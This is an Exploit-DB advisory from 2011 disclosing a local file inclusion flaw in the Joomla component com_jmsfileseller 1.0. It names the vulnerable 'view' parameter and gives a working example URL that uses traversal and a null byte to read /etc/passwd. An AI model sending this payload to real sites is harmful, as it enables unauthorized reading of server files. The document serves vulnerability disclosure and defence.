Joomla! Component com_jmsfileseller - Local File Inclusion

EDB-ID:

17338

CVE:



Author:

Valentin

Type:

webapps


Platform:

PHP

Date:

2011-05-28


# Exploit Title: Joomla Component com_jmsfileseller Local File Inclusion Vulnerability 
# Date: 28.05.2011
# Author: Valentin
# Category: webapps/0day
# Version: 1.0

# Tested on:
# CVE :  
# Code : 


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
>> General Information 
Advisory/Exploit Title = Joomla Component com_msfileseller Local File Inclusion Vulnerability 
Author = Valentin Hoebel
Contact = valentin@xenuser.org


[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = JMS FileSeller
Vendor = Joommasters team
Vendor Website = http://joommasters.com/
Affected Version(s) = 1.0


[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
>> Local File Inclusion
URL: index.php?option=com_jmsfileseller&view=<LFI value>&cat_id=1&Itemid=27
Vulnerable parameters: view
Example: index.php?option=com_jmsfileseller&view=../../../etc/passwd%00&cat_id=12&Itemid=27


[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
>> Additional Information
Advisory/Exploit Published = 28.05.2011


[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
>> Misc
Greetz = cr4wl3r, JosS, Todd and Josh from packetstormsecurity.org, exploit-db.com


[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]